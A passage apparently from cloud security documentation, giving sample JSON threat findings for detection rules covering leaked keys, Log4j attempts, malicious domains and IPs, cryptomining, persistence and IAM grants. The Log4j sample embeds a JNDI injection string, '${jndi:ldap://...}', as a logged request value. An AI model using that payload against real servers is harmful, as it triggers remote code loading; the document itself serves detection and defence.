"https://developers.google.com/admin-sdk/reports/v1/appendix/activity/login#gov_attack_warning" } } }, "securityMarks": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks" }, "eventTime": "2021-06-19T00:10:58.074Z", "createTime": "2021-06-19T00:11:01.760Z", "severity": "HIGH", "workflowState": "NEW", "canonicalName": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "findingClass": "THREAT" }, "resource": { "name": "//login.googleapis.com/organizations/ORGANIZATION_ID" } }
Initial Access: Leaked Service Account Key Used
{ "findings": { "access": { "principalEmail": "SERVICE_ACCOUNT", "callerIp": "IP_ADDRESS", "callerIpGeo": { "regionCode": "US" }, "serviceName": "SERVICE_NAME", "methodName": "METHOD_NAME" "serviceAccountKeyName": "LEAKED_SERVICE_ACCOUNT_KEY" }, "assetDisplayName": "ASSET_DISPLAY_NAME", "assetId": "organizations/ORGANIZATION_NUMBER/assets/ASSET_ID", "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Initial Access: Leaked Service Account Key Used", "contacts": { "security": { "contacts": [ { "email": "EMAIL_ADDRESS" } ] }, "technical": { "contacts": [ { "email": "EMAIL_ADDRESS" } ] } }, "createTime": "2023-07-18T10:35:47.381Z", "database": {}, "eventTime": "2023-07-18T10:35:47.270Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "INITIAL_ACCESS", "primaryTechniques": [ "VALID_ACCOUNTS", "CLOUD_ACCOUNTS" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "AFFECTED_RESOURCE", "severity": "HIGH", "sourceDisplayName": "Event Threat Detection", "state": "ACTIVE", "vulnerability": {}, "workflowState": "NEW" }, "resource": { "name": "RESOURCE_NAME", "display_name": "RESOURCE_DISPLAY_NAME", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "leaked_sa_key_used" }, "detectionPriority": "HIGH", "affectedResources": [ { "gcpResourceName": "GOOGLE_RESOURCE" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1673519681", "nanos": 728289000 }, "insertId": "INSERT_ID" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1078/004/" } } }, "description": "A leaked service account key is used, the key is leaked at LEAKED_SOURCE_URL" }
Initial Access: Log4j Compromise Attempt
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "state": "ACTIVE", "category": "Initial Access: Log4j Compromise Attempt", "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "log4j_compromise_attempt" }, "detectionPriority": "LOW", "affectedResources": [{ "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }], "evidence": [{ "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1639690492", "nanos": 9.13836E8 }, "insertId": "INSERT_ID" } }], "properties": { "loadBalancerName": "LOAD_BALANCER_NAME", "requestUrl": "REQUEST_URL?${jndi:ldap://google.com}" }, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1190/" }, "cloudLoggingQueryUri": [{ "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-12-16T21:34:52.913836Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%22PROJECT_ID%22?project\u003dPROJECT_ID" }], "relatedFindingUri": { } } }, "securityMarks": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks" }, "eventTime": "2021-12-16T21:34:52.913Z", "createTime": "2021-12-16T21:34:55.022Z", "severity": "LOW", "workflowState": "NEW", "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "mute": "UNDEFINED", "findingClass": "THREAT" }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectDisplayName": "PROJECT_ID", "parentName": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMNER", "parentDisplayName": "FOLDER_DISPLAY_NAME", "type": "google.cloud.resourcemanager.Project", "folders": [{ "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMNER", "resourceFolderDisplayName": "FOLDER_DISPLAY_NAME" }], "displayName": "PROJECT_ID" } }
Initial Access: Suspicious Login Blocked
This finding isn't available for project-level activations.
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resourceName": "//login.googleapis.com/organizations/ORGANIZATION_ID", "state": "ACTIVE", "category": "Initial Access: Suspicious Login Blocked", "sourceProperties": { "sourceId": { "organizationNumber": "ORGANIZATION_ID", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "technique": "valid_accounts", "indicator": "audit_log", "ruleName": "suspicious_login" }, "detectionPriority": "LOW", "affectedResources": [{ "gcpResourceName": "//login.googleapis.com/organizations/ORGANIZATION_ID" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID" }], "evidence": [{ "sourceLogId": { "projectId": "0", "resourceContainer": "organizations/ORGANIZATION_ID", "timestamp": { "seconds": "1621637767", "nanos": 0.0 }, "insertId": "INSERT_ID" } }], "properties": { "serviceName": "login.googleapis.com", "methodName": "google.login.LoginService.suspiciousLogin", "ssoState": "UNKNOWN", "principalEmail": "PRINCIPAL_EMAIL" }, "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1078/" }, "cloudLoggingQueryUri": [{ "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-05-21T22:56:07Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%220%22?project\u003d0" }], "workspacesUri": { "displayName": "Workspaces Link", "url": "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/login#suspicious_login" } } }, "securityMarks": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks" }, "eventTime": "2021-05-21T22:56:07Z", "createTime": "2021-05-27T02:36:07.382Z", "severity": "LOW", "workflowState": "NEW", "canonicalName": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "findingClass": "THREAT" }, "resource": { "name": "//login.googleapis.com/organizations/ORGANIZATION_ID" } }
Lateral Movement: Modified Boot Disk Attached to Instance
{ "finding": { "access": { "principalEmail": "PRINCIPAL_EMAIL", "callerIpGeo": {}, "serviceName": "compute.googleapis.com", "methodName": "v1.compute.instances.attachDisk", }, "application": {}, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/global/findings/FINDING_ID", "category": "Lateral Movement: Modify Boot Disk Attaching to Instance", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "createTime": "2024-02-01T23:55:17.589Z", "database": {}, "eventTime": "2024-02-01T23:55:17.396Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "logEntries": [ { "cloudLoggingEntry": { "insertId": "INSERT_ID", "logId": "cloudaudit.googleapis.com/activity", "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": "2024-02-01T23:55:15.017887Z" } } ], "mitreAttack": { "primaryTactic": "TACTIC_UNSPECIFIED" }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID/locations/LOCATION/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID/locations/LOCATION", "parentDisplayName": "Event Threat Detection", "resourceName": "//compute.googleapis.com/projects/PROJECT_NUMBER/zones/ZONE_ID/instances/INSTANCE_ID", "securityPosture": {}, "severity": "LOW", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//compute.googleapis.com/projects/PROJECT_NUMBER/zones/ZONE_ID/instances/INSTANCE_ID", "displayName": "INSTANCE_ID", "type": "google.compute.Instance", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectDisplayName": "PROJECT_NUMBER", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "parentDisplayName": "PROJECT_NUMBER, "folders": [ { "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "resourceFolderDisplayName": "FOLDER_NUMBER" } ], "organization": "organizations/ORGANIZATION_NUMBER" } }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "modify_boot_disk", "subRuleName": "attach_to_instance" }, "detectionPriority": "LOW", "affectedResources": [ { "gcpResourceName": "//compute.googleapis.com/projects/PROJECT_NUMBER/zones/ZONE_ID/instances/INSTANCE_ID" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }, { "gcpResourceName": "https://www.googleapis.com/compute/v1/projects/PROJECT_NUMBER/zones/ZONE_ID/disks/INSTANCE_ID" }, { "gcpResourceName": "projects/PROJECT_NUMBER/zones/ZONE_ID/instances/INSTANCE_ID" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_NUMBER", "resourceContainer": "PROJECT_NUMBER", "timestamp": { "seconds": "1706831715", "nanos": 17887000 }, "insertId": "INSERT_ID", "logId": "cloudaudit.googleapis.com/activity" } } ], "properties": { "diskId": "https://www.googleapis.com/compute/v1/projects/PROJECT_NUMBER/zones/ZONE_ID/disks/DISK_ID", "targetInstance": "projects/PROJECT_NUMBER/zones/ZONE_ID/instances/INSTANCE_ID", "workerInstances": [ "projects/PROJECT_NUMBER/zones/ZONE_ID/instances/INSTANCE_ID" ], "bootDiskPayloads": [ { "instanceId": "projects/PROJECT_NUMBER/zones/ZONE_ID/instances/INSTANCE_ID", "operation": "MODIFY_BOOT_DISK_ATTACH", "principalEmail": "PRINCIPAL_EMAIL", "eventTime": "2024-02-01T23:55:06.706640Z" }, { "instanceId": "projects/PROJECT_NUMBER/zones/ZONE_ID/instances/INSTANCE_ID", "operation": "MODIFY_BOOT_DISK_DETACH", "principalEmail": "PRINCIPAL_EMAIL", "eventTime": "2024-02-01T23:55:05.608631Z" } ] }, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1570/" }, "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222024-02-01T23:55:15.017887Z%22%0AinsertId%3D%22INSERT_ID?project=PROJECT_NUMBER" } ], "relatedFindingUri": {} } } }
Malware: Bad Domain
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "state": "ACTIVE", "category": "Malware: Bad Domain", "sourceProperties": { "sourceId": { "customerOrganizationNumber": "ORGANIZATION_ID", "projectNumber": "PROJECT_NUMBER" }, "affectedResources": [{ "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }], "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1568/" }, "virustotalIndicatorQueryUri": [ { "displayName": "VirusTotal Domain Link", "url": "https://www.virustotal.com/gui/domain/DOMAIN/detection" } ] }, "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "timestamp": { "nanos": 0.0, "seconds": "0" }, "insertId": "INSERT_ID", "resourceContainer": "projects/PROJECT_ID" } } ], "properties": { "instanceDetails": "/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID", "domains": [ "DOMAIN" ], "network": { "location": "REGION", "project": "PROJECT_ID" }, "dnsContexts": [ { "authAnswer": true, "sourceIp": "IP_ADDRESS", "queryName": "DOMAIN", "queryType": "AAAA", "responseCode": "NOERROR", "responseData": [ { "domainName": "DOMAIN.", "ttl": 299, "responseClass": "IN", "responseType": "AAAA", "responseValue": "IP_ADDRESS" } ] } ] }, "detectionPriority": "HIGH", "detectionCategory": { "technique": "C2", "indicator": "domain", "subRuleName": "google_intel", "ruleName": "bad_domain" } }, "severity": "HIGH", "eventTime": "1970-01-01T00:00:00Z", "createTime": "1970-01-01T00:00:00Z" } }
Malware: Bad IP
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "state": "ACTIVE", "category": "Malware: Bad IP", "sourceProperties": { "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "timestamp": { "nanos": 0.0, "seconds": "0" }, "insertId": "INSERT_ID", "resourceContainer": "projects/PROJECT_ID" } } ], "properties": { "ips": [ "SOURCE_IP_ADDRESS", "DESTINATION_IP_ADDRESS" ], "ipConnection": { "srcIp": "SOURCE_IP_ADDRESS", "srcPort": SOURCE_PORT, "destIp": "DESTINATION_IP_ADDRESS", "destPort": DESTINATION_PORT, "protocol": 6 }, "network": { "project": "PROJECT_ID", "location": "ZONE", "subnetworkId": "SUBNETWORK_ID", "subnetworkName": "default" }, "instanceDetails": "/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID" }, "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/tactics/TA0011/" }, "virustotalIndicatorQueryUri": [ { "displayName": "VirusTotal IP Link", "url": "https://www.virustotal.com/gui/ip-address/SOURCE_IP_ADDRESS/detection" }, { "displayName": "VirusTotal IP Link", "url": "https://www.virustotal.com/gui/ip-address/DESTINATION_IP_ADDRESS/detection" } ] }, "detectionCategory": { "technique": "C2", "indicator": "ip", "ruleName": "bad_ip", "subRuleName": "google_intel" }, "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ] }, "severity": "LOW", "eventTime": "1970-01-01T00:00:00Z", "createTime": "1970-01-01T00:00:00Z" } }
Malware: Cryptomining Bad Domain
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "state": "ACTIVE", "category": "Malware: Cryptomining Bad Domain", "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "technique": "cryptomining", "indicator": "domain", "ruleName": "bad_domain", "subRuleName": "cryptomining" }, "detectionPriority": "LOW", "affectedResources": [{ "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }], "evidence": [{ "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1636566099", "nanos": 5.41483849E8 }, "insertId": "INSERT_ID" } }], "properties": { "domains": ["DOMAIN"], "instanceDetails": "/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID", "network": { "project": "PROJECT_ID", "location": "ZONE" }, "dnsContexts": [{ "authAnswer": true, "sourceIp": "SOURCE_IP_ADDRESS", "queryName": "DOMAIN", "queryType": "A", "responseCode": "NXDOMAIN" }], "vpc": { "vpcName": "default" } }, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1496/" }, "virustotalIndicatorQueryUri": [{ "displayName": "VirusTotal Domain Link", "url": "https://www.virustotal.com/gui/domain/DOMAIN/detection" }], "cloudLoggingQueryUri": [{ "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-11-10T17:41:39.541483849Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%22PROJECT_ID%22?project\u003dPROJECT_ID" }], "relatedFindingUri": { } } }, "securityMarks": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks" }, "eventTime": "2021-11-10T17:41:41.594Z", "createTime": "2021-11-10T17:41:42.014Z", "severity": "LOW", "workflowState": "NEW", "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "mute": "UNDEFINED", "findingClass": "THREAT", "indicator": { "domains": ["DOMAIN"] } }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectDisplayName": "PROJECT_ID", "parentName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID", "parentDisplayName": "PARENT_NAME", "type": "google.cloud.resourcemanager.Project", "displayName": "PROJECT_ID" } }
Malware: Cryptomining Bad IP
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "state": "ACTIVE", "category": "Malware: Cryptomining Bad IP", "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "technique": "cryptomining", "indicator": "ip", "ruleName": "bad_ip", "subRuleName": "cryptomining" }, "detectionPriority": "LOW", "affectedResources": [{ "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }], "evidence": [{ "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1636566005", "nanos": 9.74622832E8 }, "insertId": "INSERT_ID" } }], "properties": { "ips": ["DESTINATION_IP_ADDRESS"], "instanceDetails": "/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID", "network": { "project": "PROJECT_ID", "location": "ZONE", "subnetworkId": "SUBNETWORK_ID", "subnetworkName": "default" }, "ipConnection": { "srcIp": "SOURCE_IP_ADDRESS", "destIp": "DESTINATION_IP_ADDRESS", "protocol": 1.0 }, "indicatorContext": [{ "ipAddress": "DESTINATION_IP_ADDRESS", "countryCode": "FR", "reverseDnsDomain": "REVERSE_DNS_DOMAIN", "carrierName": "CARRIER_NAME", "organizationName": "ORGANIZATION_NAME", "asn": "AUTONOMOUS_SYSTEM_NUMBERS" }], "srcVpc": { }, "destVpc": { "projectId": "PROJECT_ID", "vpcName": "default", "subnetworkName": "default" } }, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1496/" }, "virustotalIndicatorQueryUri": [{ "displayName": "VirusTotal IP Link", "url": "https://www.virustotal.com/gui/ip-address/DESTINATION_IP_ADDRESS/detection" }], "cloudLoggingQueryUri": [{ "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-11-10T17:40:05.974622832Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%22PROJECT_ID%22?project\u003dPROJECT_ID" }], "relatedFindingUri": { } } }, "securityMarks": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks" }, "eventTime": "2021-11-10T17:40:38.048Z", "createTime": "2021-11-10T17:40:38.472Z", "severity": "LOW", "workflowState": "NEW", "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "mute": "UNDEFINED", "findingClass": "THREAT", "indicator": { "ipAddresses": ["DESTINATION_IP_ADDRESS"] } }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectDisplayName": "PROJECT_ID", "parentName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID", "parentDisplayName": "PARENT_NAME", "type": "google.cloud.resourcemanager.Project", "displayName": "PROJECT_ID" } }
Malware: Outgoing DoS
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resourceName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID", "state": "ACTIVE", "category": "Malware: Outgoing DoS", "sourceProperties": { "evidence": [ { "sourceLogId": { "timestamp": { "nanos": 0.0, "seconds": "0" }, "resourceContainer": "projects/PROJECT_ID" } } ], "properties": { "sourceInstanceDetails": "/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID", "ipConnection": { "srcIp": "SOURCE_IP_ADDRESS", "srcPort": SOURCE_PORT, "destIp": "DESTINATION_IP_ADDRESS", "destPort": DESTINATION_PORT, "protocol": 17 } }, "detectionPriority": "HIGH", "sourceId": { "organizationNumber": "ORGANIZATION_ID", "customerOrganizationNumber": "ORGANIZATION_ID" }, "affectedResources": [{ "gcpResourceName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID" }], "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1498/" } }, "detectionCategory": { "technique": "malware", "indicator": "flow_log", "ruleName": "outgoing_dos" } }, "severity": "HIGH", "eventTime": "1970-01-01T00:00:00Z", "createTime": "1970-01-01T00:00:00Z" } }
Persistence: GCE Admin Added SSH Key
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resourceName": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/COMPUTE_INSTANCE_NAME", "category": "Persistence: GCE Admin Added SSH Key", "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "technique": "persistence", "indicator": "audit_log", "ruleName": "gce_admin" "subRuleName": "instance_add_ssh_key" }, "detectionPriority": "LOW", "affectedResources": [{ "gcpResourceName": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/COMPUTE_INSTANCE_NAME" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }], "evidence": [{ "sourceLogId": { "projectId": "0", "resourceContainer": "organizations/ORGANIZATION_ID", "timestamp": { "seconds": "1621624109", "nanos": 3.73721E8 }, "insertId": "INSERT_ID" } }], "properties": { "callerIp": "IP_ADDRESS", "principalEmail": "PRINCIPAL_EMAIL", "gceInstanceId": "COMPUTE_INSTANCE_ID", "projectId": "PROJECT_ID", "metadataKeyOperation": "ADDED", "callerUserAgent": "USER_AGENT", }, "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1543/" }, "cloudLoggingQueryUri": [{ "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-05-21T19:08:29.373721Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%220%22?project\u003d0" }] } }, "resource": { "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/COMPUTE_INSTANCE_NAME", } }
Persistence: GCE Admin Added Startup Script
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resourceName": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/COMPUTE_INSTANCE_NAME", "category": "Persistence: GCE Admin Added Startup Script", "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "technique": "persistence", "indicator": "audit_log", "ruleName": "gce_admin" "subRuleName": "instance_add_startup_script" }, "detectionPriority": "LOW", "affectedResources": [{ "gcpResourceName": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/COMPUTE_INSTANCE_NAME" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }], "evidence": [{ "sourceLogId": { "projectId": "0", "resourceContainer": "organizations/ORGANIZATION_ID", "timestamp": { "seconds": "1621624109", "nanos": 3.73721E8 }, "insertId": "INSERT_ID" } }], "properties": { "callerIp": "IP_ADDRESS", "principalEmail": "PRINCIPAL_EMAIL", "gceInstanceId": "COMPUTE_INSTANCE_ID", "projectId": "PROJECT_ID", "metadataKeyOperation": "ADDED", "callerUserAgent": "USER_AGENT", }, "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1543/" }, "cloudLoggingQueryUri": [{ "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-05-21T19:08:29.373721Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%220%22?project\u003d0" }] } }, "resource": { "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/COMPUTE_INSTANCE_NAME", } }
Persistence: IAM Anomalous Grant
The IAM Anomalous Grant finding is unique in that it includes sub-rules that provide more specific information about each instance of this finding. The severity classification of this finding depends on the sub-rule and each sub-rule might require a different response.
The following list shows all possible sub-rules and their severities:
external_service_account_added_to_policy:HIGHHIGH, if a highly sensitive role was granted or if a medium-sensitivity role was granted at the organization level. For more information, see Highly-sensitive roles.MEDIUM, if a medium-sensitivity role was granted. For more information, see Medium-sensitivity roles.external_member_invited_to_policy:HIGHexternal_member_added_to_policy:HIGH, if a highly sensitive role was granted or if a medium-sensitivity role was granted at the organization level. For more information, see Highly-sensitive roles.MEDIUM, if a medium-sensitivity role was granted. For more information, see Medium-sensitivity roles.
custom_role_given_sensitive_permissions:MEDIUMservice_account_granted_sensitive_role_to_member:HIGHpolicy_modified_by_default_compute_service_account:HIGH
The JSON fields that a finding includes can differ from one finding category to another. For example, the following JSON includes fields for a security account. If a finding category does not relate to a service account, those fields are not included in the JSON.
{ "findings": { "access": { "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP_ADDRESS", "callerIpGeo": { "regionCode": "REGION_CODE" }, "serviceName": "SERVICE_NAME", "methodName": "METHOD_NAME", "principalSubject": "PRINCIPAL_SUBJECT", "serviceAccountKeyName": "SERVICE_ACCOUNT_KEY_NAME" }, "assetDisplayName": "ASSET_DISPLAY_NAME", "assetId": "organizations/ORGANIZATION_ID/assets/ASSET_ID", "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Persistence: IAM Anomalous Grant", "cloudDlpInspection": {}, "contacts": { "security": { "contacts": [ { "email": "EMAIL_ADDRESS_1" }, { "email": "EMAIL_ADDRESS_2" } ] }, "technical": { "contacts": [ { "email": "EMAIL_ADDRESS_3" }, { "email": "EMAIL_ADDRESS_4" } ] } }, "createTime": "CREATE_TIMESTAMP", "database": {}, "eventTime": "EVENT_TIMESTAMP", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd", "iamBindings": [ { "action": "ADD", "role": "IAM_ROLE", "member": "serviceAccount:ACCOUNT_NAME" } ], "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "INITIAL_ACCESS", "primaryTechniques": [ "VALID_ACCOUNTS", "CLOUD_ACCOUNTS" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "RESOURCE_FULL_NAME", "severity": "SEVERITY_CLASSIFICATION", "state": "ACTIVE", "vulnerability": {}, "workflowState": "NEW" }, "resource": { "name": "RESOURCE_FULL_NAME", "display_name": "RESOURCE_DISPLAY_NAME", "project_name": "//RESOURCE/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "RESOURCE_PARENT_NAME", "parent_display_name": "PARENT_DISPLAY_NAME", "type": "RESOURCE_TYPE", "folders": [ { "resourceFolderDisplayName": "RESOURCE_FOLDER_DISPLAY_NAME", "resourceFolder": "RESOURCE_FOLDER_ID" } ] }, "sourceProperties": { "sourceId": { "projectNumber": 